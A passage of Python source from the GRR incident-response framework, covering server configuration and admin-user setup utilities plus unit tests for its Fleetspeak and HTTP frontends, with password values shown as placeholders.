extension = os.path.splitext(sys.executable)[1]
pip = "%s/pip%s" % (virtualenv_bin, extension)
# Install the GRR server component to satisfy the dependency below.
major_minor_version = ".".join(
pkg_resources.get_distribution("grr-response-core").version.split(".")
[0:2])
# Note that this version spec requires a recent version of pip
subprocess.check_call([
sys.executable, pip, "install", "--upgrade", "-f",
"https://storage.googleapis.com/releases.grr-response.com/index.html",
"grr-response-templates==%s.*" % major_minor_version
])
def FinalizeConfigInit(config,
token,
admin_password = <PASSWORD>,
redownload_templates = False,
repack_templates = True,
prompt = True):
"""Performs the final steps of config initialization."""
config.Set("Server.initialized", True)
print("\nWriting configuration to %s." % config["Config.writeback"])
config.Write()
print("Initializing the datastore.")
# Reload the config and initialize the GRR database.
server_startup.Init()
print("\nStep 3: Adding GRR Admin User")
try:
CreateUser("admin", password=<PASSWORD>, is_admin=True)
except UserAlreadyExistsError:
if prompt:
# pytype: disable=wrong-arg-count
if ((builtins.input("User 'admin' already exists, do you want to "
"reset the password? [yN]: ").upper() or "N") == "Y"):
UpdateUser("admin", password=<PASSWORD>, is_admin=True)
# pytype: enable=wrong-arg-count
else:
UpdateUser("admin", password=<PASSWORD>, is_admin=True)
print("\nStep 4: Repackaging clients with new configuration.")
if prompt:
redownload_templates = RetryBoolQuestion(
"Server debs include client templates. Re-download templates?", False)
repack_templates = RetryBoolQuestion("Repack client templates?", True)
if redownload_templates:
InstallTemplatePackage()
# Build debug binaries, then build release binaries.
if repack_templates:
repacking.TemplateRepacker().RepackAllTemplates(upload=True, token=token)
print("\nGRR Initialization complete! You can edit the new configuration "
"in %s.\n" % config["Config.writeback"])
print("Please restart the service for the new configuration to take "
"effect.\n")
def Initialize(config=None,
external_hostname = None,
admin_password = <PASSWORD>,
redownload_templates = False,
repack_templates = True,
token = None):
"""Initialize or update a GRR configuration."""
print("Checking write access on config %s" % config["Config.writeback"])
if not os.access(config.parser.filename, os.W_OK):
raise IOError("Config not writeable (need sudo?)")
print("\nStep 0: Importing Configuration from previous installation.")
options_imported = 0
prev_config_file = config.Get("ConfigUpdater.old_config", default=None)
if prev_config_file and os.access(prev_config_file, os.R_OK):
print("Found config file %s." % prev_config_file)
# pytype: disable=wrong-arg-count
if builtins.input("Do you want to import this configuration? "
"[yN]: ").upper() == "Y":
options_imported = ImportConfig(prev_config_file, config)
# pytype: enable=wrong-arg-count
else:
print("No old config file found.")
print("\nStep 1: Setting Basic Configuration Parameters")
print("We are now going to configure the server using a bunch of questions.")
ConfigureDatastore(config)
ConfigureUrls(config, external_hostname=external_hostname)
ConfigureEmails(config)
print("\nStep 2: Key Generation")
if config.Get("PrivateKeys.server_key", default=None):
if options_imported > 0:
print("Since you have imported keys from another installation in the "
"last step,\nyou probably do not want to generate new keys now.")
# pytype: disable=wrong-arg-count
if (builtins.input("You already have keys in your config, do you want to"
" overwrite them? [yN]: ").upper() or "N") == "Y":
config_updater_keys_util.GenerateKeys(config, overwrite_keys=True)
# pytype: enable=wrong-arg-count
else:
config_updater_keys_util.GenerateKeys(config)
FinalizeConfigInit(
config,
token,
admin_password=<PASSWORD>,
redownload_templates=redownload_templates,
repack_templates=repack_templates,
prompt=True)
def InitializeNoPrompt(config=None,
external_hostname = None,
admin_password = <PASSWORD>,
mysql_hostname = None,
mysql_port = None,
mysql_username = None,
mysql_password = <PASSWORD>,
mysql_db = None,
mysql_client_key_path = None,
mysql_client_cert_path = None,
mysql_ca_cert_path = None,
redownload_templates = False,
repack_templates = True,
token = None):
"""Initialize GRR with no prompts.
Args:
config: config object
external_hostname: A hostname.
admin_password: <PASSWORD> the <PASSWORD>.
mysql_hostname: A hostname used for establishing connection to MySQL.
mysql_port: A port used for establishing connection to MySQL.
mysql_username: A username used for establishing connection to MySQL.
mysql_password: <PASSWORD>.
mysql_db: Name of the MySQL database to use.
mysql_client_key_path: The path name of the client private key file.
mysql_client_cert_path: The path name of the client public key certificate.
mysql_ca_cert_path: The path name of the CA certificate file.
redownload_templates: Indicates whether templates should be re-downloaded.
repack_templates: Indicates whether templates should be re-packed.
token: auth token
Raises:
ValueError: if required flags are not provided, or if the config has
already been initialized.
IOError: if config is not writeable
ConfigInitError: if GRR is unable to connect to a running MySQL instance.
This method does the minimum work necessary to configure GRR without any user
prompting, relying heavily on config default values. User must supply the
external hostname, admin password, and MySQL password; everything else is set
automatically.
"""
if config["Server.initialized"]:
raise ValueError("Config has already been initialized.")
if not external_hostname:
raise ValueError(
"--noprompt set, but --external_hostname was not provided.")
if not admin_password:
raise ValueError("--noprompt set, but --admin_password was not provided.")
if mysql_password is None:
raise ValueError("--noprompt set, but --mysql_password was not provided.")
print("Checking write access on config %s" % config.parser)
if not os.access(config.parser.filename, os.W_OK):
raise IOError("Config not writeable (need sudo?)")
config_dict = {}
config_dict["Datastore.implementation"] = "MySQLAdvancedDataStore"
config_dict["Mysql.host"] = mysql_hostname or config["Mysql.host"]
config_dict["Mysql.port"] = mysql_port or config["Mysql.port"]
config_dict["Mysql.database_name"] = mysql_db or config["Mysql.database_name"]
config_dict["Mysql.database_username"] = (
mysql_username or config["Mysql.database_username"])
config_dict["Client.server_urls"] = [
"http://%s:%s/" % (external_hostname, config["Frontend.bind_port"])
]
config_dict["AdminUI.url"] = "http://%s:%s" % (external_hostname,
config["AdminUI.port"])
config_dict["Logging.domain"] = external_hostname
config_dict["Monitoring.alert_email"] = (
"grr-monitoring@%s" % external_hostname)
config_dict["Monitoring.emergency_access_email"] = (
"grr-emergency@%s" % external_hostname)
# Print all configuration options, except for the MySQL password.
print("Setting configuration as:\n\n%s" % config_dict)
config_dict["Mysql.database_password"] = mysql_password
if mysql_client_key_path is not None:
config_dict["Mysql.client_key_path"] = mysql_client_key_path
config_dict["Mysql.client_cert_path"] = mysql_client_cert_path
config_dict["Mysql.ca_cert_path"] = mysql_ca_cert_path
if CheckMySQLConnection(config_dict):
print("Successfully connected to MySQL with the given configuration.")
else:
print("Error: Could not connect to MySQL with the given configuration.")
raise ConfigInitError()
for key, value in iteritems(config_dict):
config.Set(key, value)
config_updater_keys_util.GenerateKeys(config)
FinalizeConfigInit(
config,
token,
admin_password=<PASSWORD>,
redownload_templates=redownload_templates,
repack_templates=repack_templates,
prompt=False)
def GetToken():
# Extend for user authorization
# SetUID is required to create and write to various aff4 paths when updating
# config.
return access_control.ACLToken(username="GRRConsole").SetUID()
def UploadSignedBinary(source_path,
binary_type,
platform,
upload_subdirectory="",
token=None):
"""Signs a binary and uploads it to the datastore.
Args:
source_path: Path to the binary to upload.
binary_type: Type of the binary, e.g python-hack or executable.
platform: Client platform where the binary is intended to be run.
upload_subdirectory: Path of a subdirectory to upload the binary to,
relative to the canonical path for binaries of the given type and
platform.
token: ACL token to use for uploading.
Raises:
BinaryTooLargeError: If the binary to upload is too large.
"""
if binary_type == rdf_objects.SignedBinaryID.BinaryType.PYTHON_HACK:
root_urn = signed_binary_utils.GetAFF4PythonHackRoot()
elif binary_type == rdf_objects.SignedBinaryID.BinaryType.EXECUTABLE:
root_urn = signed_binary_utils.GetAFF4ExecutablesRoot()
else:
raise ValueError("Unknown binary type %s." % binary_type)
file_size = os.path.getsize(source_path)
if file_size > _MAX_SIGNED_BINARY_BYTES:
raise BinaryTooLargeError(
"File [%s] is of size %d (bytes), which exceeds the allowed maximum "
"of %d bytes." % (source_path, file_size, _MAX_SIGNED_BINARY_BYTES))
binary_urn = root_urn.Add(platform.lower()).Add(upload_subdirectory).Add(
os.path.basename(source_path))
context = ["Platform:%s" % platform.title(), "Client Context"]
with open(source_path, "rb") as f:
file_content = f.read()
maintenance_utils.UploadSignedConfigBlob(
file_content, aff4_path=binary_urn, client_context=context, token=token)
print("Uploaded to %s" % binary_urn)
def CreateUser(username, password=<PASSWORD>, is_admin=False):
"""Creates a new GRR user."""
grr_api = _CreateInProcessRootGRRAPI()
try:
user_exists = grr_api.GrrUser(username).Get() is not None
except api_errors.ResourceNotFoundError:
user_exists = False
if user_exists:
raise UserAlreadyExistsError("User '%s' already exists." % username)
user_type, password = _GetUserTypeAndPassword(
username, password=password, is_admin=is_admin)
grr_api.CreateGrrUser(
username=username, user_type=user_type, password=password)
def UpdateUser(username, password=<PASSWORD>, is_admin=False):
"""Updates the password or privilege-level for a user."""
user_type, password = _GetUserTypeAndPassword(
username, password=password, is_admin=is_admin)
grr_api = _CreateInProcessRootGRRAPI()
grr_user = grr_api.GrrUser(username).Get()
grr_user.Modify(user_type=user_type, password=password)
def GetUserSummary(username):
"""Returns a string with summary info for a user."""
grr_api = _CreateInProcessRootGRRAPI()
try:
return _Summarize(grr_api.GrrUser(username).Get().data)
except api_errors.ResourceNotFoundError:
raise UserNotFoundError(username)
def GetAllUserSummaries():
"""Returns a string containing summary info for all GRR users."""
grr_api = _CreateInProcessRootGRRAPI()
user_wrappers = sorted(grr_api.ListGrrUsers(), key=lambda x: x.username)
summaries = [_Summarize(w.data) for w in user_wrappers]
return "\n\n".join(summaries)
def _Summarize(user_info):
"""Returns a string with summary info for a user."""
return "Username: %s\nIs Admin: %s" % (
user_info.username,
user_info.user_type == api_user.ApiGrrUser.UserType.USER_TYPE_ADMIN)
def DeleteUser(username):
"""Deletes a GRR user from the datastore."""
grr_api = _CreateInProcessRootGRRAPI()
try:
grr_api.GrrUser(username).Get().Delete()
except api_errors.ResourceNotFoundError:
raise UserNotFoundError(username)
def _CreateInProcessRootGRRAPI():
return api.GrrApi(
connector=api_shell_raw_access_lib.RawConnector(
token=GetToken(), page_size=_GRR_API_PAGE_SIZE)).root
def _GetUserTypeAndPassword(username, password=<PASSWORD>, is_admin=False):
"""Returns the user-type and password for a user.
Args:
username: Username for the user.
password: <PASSWORD>. If None, or not provided, we will prompt
for one via the terminal.
is_admin: Indicates whether the user should have admin privileges.
"""
if is_admin:
user_type = api_user.ApiGrrUser.UserType.USER_TYPE_ADMIN
else:
user_type = api_user.ApiGrrUser.UserType.USER_TYPE_STANDARD
if password is None:
# TODO
# pytype: disable=wrong-arg-types
password = getpass.getpass(
prompt="Please enter password for user '%s':" % username)
# pytype: enable=wrong-arg-types
return user_type, password
```
#### File: grr_response_server/bin/fleetspeak_frontend_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import itertools
from builtins import range # pylint: disable=redefined-builtin
import mock
from fleetspeak.src.common.proto.fleetspeak import common_pb2 as fs_common_pb2
from fleetspeak.src.server.grpcservice.client import client as fs_client
from fleetspeak.src.server.proto.fleetspeak_server import admin_pb2 as fs_admin_pb2
from grr_response_core.lib import communicator
from grr_response_core.lib import flags
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_proto import jobs_pb2
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import events
from grr_response_server import fleetspeak_connector
from grr_response_server import fleetspeak_utils
from grr_response_server import queue_manager
from grr_response_server.bin import fleetspeak_frontend as fs_frontend_tool
from grr_response_server.flows.general import processes as flow_processes
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr.test_lib import action_mocks
from grr.test_lib import db_test_lib
from grr.test_lib import fleetspeak_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import frontend_test_lib
from grr.test_lib import test_lib
FS_SERVICE_NAME = "GRR"
class _FakeGRPCServiceClient(fs_client.ServiceClient):
class _FakeConnection(object):
def __init__(self, send_callback=lambda _: None):
self._send_callback = send_callback
def InsertMessage(self, message, timeout=None):
del timeout
self._send_callback(message)
def ListClients(self, request):
clients = []
for client_id in request.client_ids:
clients.append(
fs_admin_pb2.Client(
client_id=client_id,
labels=[
fs_common_pb2.Label(
service_name="client", label="alphabet"),
fs_common_pb2.Label(
service_name="client", label="alphabet-google-corp"),
fs_common_pb2.Label(service_name="client", label="linux"),
]))
return fs_admin_pb2.ListClientsResponse(clients=clients)
def __init__(self, service_name, send_callback=lambda _: None):
super(_FakeGRPCServiceClient, self).__init__(service_name)
self._process = None
self._send_callback = send_callback
self.outgoing = self._FakeConnection(send_callback)
def Listen(self, process):
self._process = process
def Send(self, message):
self._send_callback(message)
def MockIncomingFSMessage(self, message):
self._process(message)
def MockIncomingFSMessages(self, messages):
for message in messages:
self.MockIncomingFSMessage(message)
def SetAFF4FSEnabledFlag(grr_id, token):
with aff4.FACTORY.Create(
grr_id, aff4.AFF4Object.classes["VFSGRRClient"], mode="w",
token=token) as client:
client.Set(client.Schema.FLEETSPEAK_ENABLED, rdfvalue.RDFBool(True))
@db_test_lib.DualDBTest
class FleetspeakGRRFEServerTest(frontend_test_lib.FrontEndServerTest):
"""Tests the Fleetspeak based GRRFEServer."""
def setUp(self):
super(FleetspeakGRRFEServerTest, self).setUp()
fake_conn = _FakeGRPCServiceClient(FS_SERVICE_NAME)
self._conn_overrider = fleetspeak_test_lib.ConnectionOverrider(fake_conn)
self._conn_overrider.Start()
def tearDown(self):
super(FleetspeakGRRFEServerTest, self).tearDown()
self._conn_overrider.Stop()
@db_test_lib.LegacyDataStoreOnly
def testReceiveMessages_Legacy(self):
fsd = fs_frontend_tool.GRRFSServer()
grr_client_nr = 0xab
grr_client_id_urn = self.SetupClient(grr_client_nr)
flow_obj = self.FlowSetup(flow_test_lib.FlowOrderTest.__name__,
grr_client_id_urn)
num_msgs = 9
session_id = flow_obj.session_id
messages = [
rdf_flows.GrrMessage(
request_id=1,
response_id=i,
session_id=session_id,
payload=rdfvalue.RDFInteger(i)) for i in range(1, num_msgs + 1)
]
fs_client_id = b"\x10\x00\x00\x00\x00\x00\x00\xab"
# fs_client_id should be equivalent to grr_client_id_urn
self.assertEqual(
fs_client_id,
fleetspeak_utils.GRRIDToFleetspeakID(grr_client_id_urn.Basename()))
fs_messages = [
fs_common_pb2.Message(
message_type="GrrMessage",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
for _ in range(num_msgs)
]
for fs_message, message in itertools.izip(fs_messages, messages):
fs_message.data.Pack(message.AsPrimitiveProto())
for msg in fs_messages:
fsd.Process(msg, None)
# Make sure the task is still on the client queue
manager = queue_manager.QueueManager(token=self.token)
tasks_on_client_queue = manager.Query(grr_client_id_urn, 100)
self.assertLen(tasks_on_client_queue, 1)
want_messages = [message.Copy() for message in messages]
for want_message in want_messages:
# This is filled in by the frontend as soon as it gets the message.
want_message.auth_state = (
rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED)
want_message.source = grr_client_id_urn
stored_messages = data_store.DB.ReadResponsesForRequestId(session_id, 1)
self.assertLen(stored_messages, len(want_messages))
stored_messages.sort(key=lambda m: m.response_id)
# Check that messages were stored correctly
for stored_message, want_message in itertools.izip(stored_messages,
want_messages):
stored_message.timestamp = None
self.assertRDFValuesEqual(stored_message, want_message)
def testReceiveMessages_Relational(self):
if not data_store.RelationalDBFlowsEnabled():
self.skipTest("Rel-db-only test.")
fs_server = fs_frontend_tool.GRRFSServer()
client_id = "C.1234567890123456"
flow_id = "12345678"
data_store.REL_DB.WriteClientMetadata(client_id, fleetspeak_enabled=True)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
create_time=rdfvalue.RDFDatetime.Now())
data_store.REL_DB.WriteFlowObject(rdf_flow)
flow_request = rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
data_store.REL_DB.WriteFlowRequests([flow_request])
session_id = "%s/%s" % (client_id, flow_id)
fs_client_id = fleetspeak_utils.GRRIDToFleetspeakID(client_id)
fs_messages = []
for i in range(1, 10):
grr_message = rdf_flows.GrrMessage(
request_id=1,
response_id=i + 1,
session_id=session_id,
payload=rdfvalue.RDFInteger(i))
fs_message = fs_common_pb2.Message(
message_type="GrrMessage",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(grr_message.AsPrimitiveProto())
fs_messages.append(fs_message)
with test_lib.FakeTime(rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123)):
for fs_message in fs_messages:
fs_server.Process(fs_message, None)
# Ensure the last-ping timestamp gets updated.
client_data = data_store.REL_DB.MultiReadClientMetadata([client_id])
self.assertEqual(client_data[client_id].ping,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123))
flow_data = data_store.REL_DB.ReadAllFlowRequestsAndResponses(
client_id, flow_id)
self.assertLen(flow_data, 1)
stored_flow_request, flow_responses = flow_data[0]
self.assertEqual(stored_flow_request, flow_request)
self.assertLen(flow_responses, 9)
@db_test_lib.LegacyDataStoreOnly
def testReceiveMessageList(self):
fsd = fs_frontend_tool.GRRFSServer()
grr_client_nr = 0xab
grr_client_id_urn = self.SetupClient(grr_client_nr)
flow_obj = self.FlowSetup(flow_test_lib.FlowOrderTest.__name__,
grr_client_id_urn)
num_msgs = 9
session_id = flow_obj.session_id
messages = [
rdf_flows.GrrMessage(
request_id=1,
response_id=i,
session_id=session_id,
payload=rdfvalue.RDFInteger(i)) for i in range(1, num_msgs + 1)
]
fs_client_id = b"\x10\x00\x00\x00\x00\x00\x00\xab"
# fs_client_id should be equivalent to grr_client_id_urn
self.assertEqual(
fs_client_id,
fleetspeak_utils.GRRIDToFleetspeakID(grr_client_id_urn.Basename()))
message_list = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=messages), message_list)
fs_message = fs_common_pb2.Message(
message_type="MessageList",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(message_list.AsPrimitiveProto())
fsd.Process(fs_message, None)
# Make sure the task is still on the client queue
manager = queue_manager.QueueManager(token=self.token)
tasks_on_client_queue = manager.Query(grr_client_id_urn, 100)
self.assertLen(tasks_on_client_queue, 1)
want_messages = [message.Copy() for message in messages]
for want_message in want_messages:
# This is filled in by the frontend as soon as it gets the message.
want_message.auth_state = (
rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED)
want_message.source = grr_client_id_urn
stored_messages = data_store.DB.ReadResponsesForRequestId(session_id, 1)
self.assertLen(stored_messages, len(want_messages))
stored_messages.sort(key=lambda m: m.response_id)
# Check that messages were stored correctly
for stored_message, want_message in itertools.izip(stored_messages,
want_messages):
stored_message.timestamp = None
self.assertRDFValuesEqual(stored_message, want_message)
def testReceiveMessageList_Relational(self):
if not data_store.RelationalDBFlowsEnabled():
self.skipTest("Rel-db-only test.")
fs_server = fs_frontend_tool.GRRFSServer()
client_id = "C.1234567890123456"
flow_id = "12345678"
data_store.REL_DB.WriteClientMetadata(client_id, fleetspeak_enabled=True)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
create_time=rdfvalue.RDFDatetime.Now())
data_store.REL_DB.WriteFlowObject(rdf_flow)
flow_request = rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
data_store.REL_DB.WriteFlowRequests([flow_request])
session_id = "%s/%s" % (client_id, flow_id)
fs_client_id = fleetspeak_utils.GRRIDToFleetspeakID(client_id)
grr_messages = []
for i in range(1, 10):
grr_message = rdf_flows.GrrMessage(
request_id=1,
response_id=i + 1,
session_id=session_id,
payload=rdfvalue.RDFInteger(i))
grr_messages.append(grr_message)
packed_messages = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=grr_messages), packed_messages)
fs_message = fs_common_pb2.Message(
message_type="MessageList",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(packed_messages.AsPrimitiveProto())
with test_lib.FakeTime(rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123)):
fs_server.Process(fs_message, None)
# Ensure the last-ping timestamp gets updated.
client_data = data_store.REL_DB.MultiReadClientMetadata([client_id])
self.assertEqual(client_data[client_id].ping,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123))
flow_data = data_store.REL_DB.ReadAllFlowRequestsAndResponses(
client_id, flow_id)
self.assertLen(flow_data, 1)
stored_flow_request, flow_responses = flow_data[0]
self.assertEqual(stored_flow_request, flow_request)
self.assertLen(flow_responses, 9)
def testWriteLastPingForNewClients(self):
if not data_store.RelationalDBFlowsEnabled():
self.skipTest("Rel-db-only test.")
fs_server = fs_frontend_tool.GRRFSServer()
client_id = "C.1234567890123456"
flow_id = "12345678"
session_id = "%s/%s" % (client_id, flow_id)
fs_client_id = fleetspeak_utils.GRRIDToFleetspeakID(client_id)
grr_message = rdf_flows.GrrMessage(
request_id=1,
response_id=1,
session_id=session_id,
payload=rdfvalue.RDFInteger(1))
fs_message = fs_common_pb2.Message(
message_type="GrrMessage",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(grr_message.AsPrimitiveProto())
fake_time = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123)
with mock.patch.object(
events.Events, "PublishEvent",
wraps=events.Events.PublishEvent) as publish_event_fn:
with mock.patch.object(
data_store.REL_DB,
"WriteClientMetadata",
wraps=data_store.REL_DB.WriteClientMetadata) as write_metadata_fn:
with test_lib.FakeTime(fake_time):
fs_server.Process(fs_message, None)
self.assertEqual(write_metadata_fn.call_count, 1)
client_data = data_store.REL_DB.MultiReadClientMetadata([client_id])
self.assertEqual(client_data[client_id].ping, fake_time)
# TODO(user): publish_event_fn.assert_any_call(
# "ClientEnrollment", mock.ANY, token=mock.ANY) doesn't work here
# for some reason.
triggered_events = []
for call_args, _ in publish_event_fn.call_args_list:
if call_args:
triggered_events.append(call_args[0])
self.assertIn("ClientEnrollment", triggered_events)
@db_test_lib.DualDBTest
class ListProcessesFleetspeakTest(flow_test_lib.FlowTestsBaseclass):
"""Test the process listing flow w/ Fleetspeak."""
def setUp(self):
super(ListProcessesFleetspeakTest, self).setUp()
self.client_id = self.SetupClient(0)
SetAFF4FSEnabledFlag(self.client_id, token=self.token)
data_store.REL_DB.WriteClientMetadata(
self.client_id.Basename(), fleetspeak_enabled=True)
def testProcessListingOnlyFleetspeak(self):
"""Test that the ListProcesses flow works with Fleetspeak."""
client_mock = action_mocks.ListProcessesMock([
rdf_client.Process(
pid=2,
ppid=1,
cmdline=["cmd.exe"],
exe=r"c:\windows\cmd.exe",
ctime=1333718907167083)
])
client_mock.mock_task_queue = []
def SendCallback(fs_msg):
pb_msg = jobs_pb2.GrrMessage()
fs_msg.data.Unpack(pb_msg)
msg = rdf_flows.GrrMessage.FromSerializedString(
pb_msg.SerializeToString())
client_mock.mock_task_queue.append(msg)
fake_conn = _FakeGRPCServiceClient(
FS_SERVICE_NAME, send_callback=SendCallback)
with fleetspeak_test_lib.ConnectionOverrider(fake_conn):
with mock.patch.object(
fake_conn.outgoing,
"InsertMessage",
wraps=fake_conn.outgoing.InsertMessage):
session_id = flow_test_lib.TestFlowHelper(
flow_processes.ListProcesses.__name__,
client_mock,
client_id=self.client_id,
token=self.token)
fleetspeak_connector.CONN.outgoing.InsertMessage.assert_called()
# Check the output collection
processes = flow_test_lib.GetFlowResults(self.client_id, session_id)
self.assertLen(processes, 1)
process, = processes
self.assertEqual(process.ctime, 1333718907167083)
self.assertEqual(process.cmdline, ["cmd.exe"])
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/bin/frontend_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import hashlib
import os
import socket
import threading
import time
from future.builtins import range
from future.utils import iteritems
import ipaddr
import portpicker
import requests
from grr_response_core.lib import flags
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import file_finder as rdf_file_finder
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import data_store_utils
from grr_response_server import db
from grr_response_server import file_store
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.aff4_objects import filestore
from grr_response_server.bin import frontend
from grr_response_server.flows.general import file_finder
from grr.test_lib import action_mocks
from grr.test_lib import db_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
from grr.test_lib import worker_mocks
@db_test_lib.DualDBTest
class GRRHTTPServerTest(test_lib.GRRBaseTest):
"""Test the http server."""
@classmethod
def setUpClass(cls):
super(GRRHTTPServerTest, cls).setUpClass()
# Bring up a local server for testing.
port = portpicker.pick_unused_port()
ip = utils.ResolveHostnameToIP("localhost", port)
cls.httpd = frontend.GRRHTTPServer((ip, port),
frontend.GRRHTTPServerHandler)
if ipaddr.IPAddress(ip).version == 6:
cls.address_family = socket.AF_INET6
cls.base_url = "http://[%s]:%d/" % (ip, port)
else:
cls.address_family = socket.AF_INET
cls.base_url = "http://%s:%d/" % (ip, port)
cls.httpd_thread = threading.Thread(
name="GRRHTTPServerTestThread", target=cls.httpd.serve_forever)
cls.httpd_thread.daemon = True
cls.httpd_thread.start()
@classmethod
def tearDownClass(cls):
cls.httpd.Shutdown()
cls.httpd_thread.join()
def setUp(self):
super(GRRHTTPServerTest, self).setUp()
self.client_id = self.SetupClient(0)
def tearDown(self):
super(GRRHTTPServerTest, self).tearDown()
# Wait until all pending http requests have been handled.
for _ in range(100):
if frontend.GRRHTTPServerHandler.active_counter == 0:
return
time.sleep(0.01)
self.fail("HTTP server thread did not shut down in time.")
def testServerPem(self):
req = requests.get(self.base_url + "server.pem")
self.assertEqual(req.status_code, 200)
self.assertIn("BEGIN CERTIFICATE", req.content)
def _RunClientFileFinder(self,
paths,
action,
network_bytes_limit=None,
client_id=None):
client_id = client_id or self.SetupClient(0)
with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}):
session_id = flow_test_lib.TestFlowHelper(
file_finder.ClientFileFinder.__name__,
action_mocks.ClientFileFinderClientMock(
client_worker=worker_mocks.FakeClientWorker()),
client_id=client_id,
paths=paths,
pathtype=rdf_paths.PathSpec.PathType.OS,
action=action,
process_non_regular_files=True,
network_bytes_limit=network_bytes_limit,
token=self.token)
return session_id
def testClientFileFinderUpload(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download()
session_id = self._RunClientFileFinder(paths, action)
results = flow_test_lib.GetFlowResults(self.client_id, session_id)
self.assertLen(results, 5)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertCountEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist",
"parser_test/InstallHistory.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = open(r.stat_entry.pathspec.path, "rb").read()
self.assertEqual(aff4_obj.Read(100), data[:100])
if data_store.RelationalDBReadEnabled(category="filestore"):
fd = file_store.OpenFile(
db.ClientPath.FromPathSpec(self.client_id.Basename(),
r.stat_entry.pathspec))
self.assertEqual(fd.read(100), data[:100])
self.assertEqual(fd.hash_id.AsBytes(), hashlib.sha256(data).digest())
else:
hash_obj = data_store_utils.GetFileHashEntry(aff4_obj)
self.assertEqual(hash_obj.sha1, hashlib.sha1(data).hexdigest())
self.assertEqual(hash_obj.sha256, hashlib.sha256(data).hexdigest())
self.assertEqual(hash_obj.md5, hashlib.md5(data).hexdigest())
def testClientFileFinderUploadLimit(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download()
# TODO(hanuszczak): Instead of catching arbitrary runtime errors, we should
# catch specific instance that was thrown. Unfortunately, all errors are
# intercepted in the `MockWorker` class and converted to runtime errors.
with self.assertRaisesRegexp(RuntimeError, "exceeded network send limit"):
with test_lib.SuppressLogs():
self._RunClientFileFinder(paths, action, network_bytes_limit=1500)
def testClientFileFinderUploadBound(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download(
oversized_file_policy="DOWNLOAD_TRUNCATED", max_size=300)
session_id = self._RunClientFileFinder(paths, action)
results = flow_test_lib.GetFlowResults(self.client_id, session_id)
self.assertLen(results, 5)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertCountEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist",
"parser_test/InstallHistory.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = aff4_obj.read()
self.assertLessEqual(len(data), 300)
self.assertEqual(data,
open(r.stat_entry.pathspec.path, "rb").read(len(data)))
def testClientFileFinderUploadSkip(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download(
oversized_file_policy="SKIP", max_size=300)
session_id = self._RunClientFileFinder(paths, action)
results = flow_test_lib.GetFlowResults(self.client_id, session_id)
skipped = []
uploaded = []
for result in results:
if result.HasField("transferred_file"):
uploaded.append(result)
else:
skipped.append(result)
self.assertLen(uploaded, 2)
self.assertLen(skipped, 3)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in uploaded
]
self.assertCountEqual(relpaths, ["History.plist", "test.plist"])
for r in uploaded:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
self.assertEqual(
aff4_obj.Read(100),
open(r.stat_entry.pathspec.path, "rb").read(100))
def testClientFileFinderFilestoreIntegration(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download()
client_ids = self.SetupClients(2)
session_ids = {
c: self._RunClientFileFinder(paths, action, client_id=c)
for c in client_ids
}
results_per_client = {
c: flow_test_lib.GetFlowResults(c, session_id)
for c, session_id in iteritems(session_ids)
}
for client_id, results in iteritems(results_per_client):
